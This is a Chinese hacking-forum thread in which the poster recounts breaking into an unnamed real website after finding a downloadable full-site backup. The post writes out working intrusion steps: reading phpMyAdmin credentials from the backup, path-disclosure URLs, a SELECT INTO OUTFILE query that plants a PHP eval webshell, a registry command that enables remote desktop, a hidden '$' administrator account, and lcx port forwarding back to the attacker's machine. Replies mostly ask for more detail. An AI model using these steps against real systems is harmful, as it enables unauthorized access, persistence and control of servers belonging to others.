查看: 12995|回复: 5

一次无技术含量的过程,利用网站备份包可下载

[复制链接]
  • TA的每日心情

    2015-8-14 20:30
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2014-11-24 14:12:24 | 显示全部楼层 |阅读模式
    目标站这里就不说域名了。我习惯性的扔wvs里面扫扫,结果就扫出来了个web.zip

    我访问了一下  可以下载。  再看一下文件大小,七百多M。   估计是整站!

    下载完打开看一下,和网站基本一样,应该是最近刚备份的。那就顺利了!
    这个网站很乱,好几个目录,各种bbs,cms。还有uc_server,phpmyadmin。要是一个个的试,会走不少弯路。
    我截断上传不解析的弯路就不提了  直接说重点。
    压缩包到手,先别急着去利用,先翻翻目录。  仔细看看,  然后我就在一个/bbs/xue/的目录下找到了个phpmyadmin
    在目录里翻翻密码文件 一般在inc/config.inc.php里面。

    登陆phpmyadmin成功
    这里就可以利用它来拿shell了。
    先爆路径。访问下面两个文件试试
    /phpmyadmin/libraries/lect_lang.lib.php
    /phpmyadmin/themes/darkblue_orange/layout.inc.php
    爆出来了 然后执行语句
    select '<?php @eval($_POST[pass]);?>'INTO OUTFILE '爆出的路径/phpmyadmin/m.php'
    菜刀链接之。
    QQ截图20141124025050.png

    一路下来都很顺利,然后我就想这个网站安全做的很差,结果真是这样。菜刀上去whoami。直接system权限。
    查看一下端口   没开3389。  用cmd命令试试
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    然后再查看端口,3389开了。
    创建了一个带$用户  远程连接一下。  连接不上。   是内网。
    这里就用lcx转发一下吧
    本机: lcx -listen 2222 3333
    2222为转发端口,3333为本机任意未被占用的端口
    服务器:lcx -slave 本机IP 2222 127.0.0.1 3389
    然后访问远程桌面127.0.0.1:3333
    成功进去了。
    可以说是一个压缩包印发的渗透。千万别忽视网络安全。
    QQ截图20141124023537.png

    评分

    参与人数 1i币 +10 收起 理由
    kali + 10 图文并茂效果才会更好..不过分享是一种美德.

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2014-11-24 14:37:51 | 显示全部楼层
    细节不够。细节的截图一个没有,结果的截图是有两个。

    点评

    因为没什么技术含量 文字完全就写出细节了。  详情 回复 发表于 2014-11-24 15:29
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-8-14 20:30
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2014-11-24 15:29:44 | 显示全部楼层
    C4r1st 发表于 2014-11-24 14:37
    细节不够。细节的截图一个没有,结果的截图是有两个。

    因为没什么技术含量  文字完全就写出细节了。
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-11-24 16:51:02 | 显示全部楼层
    还想再多看看呢 没什么内容
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-11-24 17:12:56 | 显示全部楼层
    屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P

    评分

    参与人数 1i币 -10 收起 理由
    蓝色_ -10 恶意灌水

    查看全部评分

    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-8-27 01:19
  • 签到天数: 50 天

    [LV.5]常住居民I

    发表于 2014-11-25 12:10:12 | 显示全部楼层
    .....希望看到细节
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-1 19:22 , Processed in 0.042289 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部